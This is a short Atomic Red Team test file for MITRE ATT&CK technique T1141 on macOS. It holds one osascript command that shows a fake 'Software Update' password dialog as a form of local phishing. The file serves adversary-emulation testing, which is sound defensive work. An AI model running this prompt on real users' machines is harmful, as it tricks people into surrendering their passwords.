Files
atomic-red-team/Mac/Credential_Access/Input_Prompt.md
T

13 lines
559 B
Markdown
Raw Normal View History

2017-12-29 12:12:54 -05:00
# Input Prompt
MITRE ATT&CK Technique: [T1141](https://attack.mitre.org/wiki/Technique/T1141)
### Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
2018-01-02 07:52:43 -07:00
Reference:
2017-12-29 12:12:54 -05:00
http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html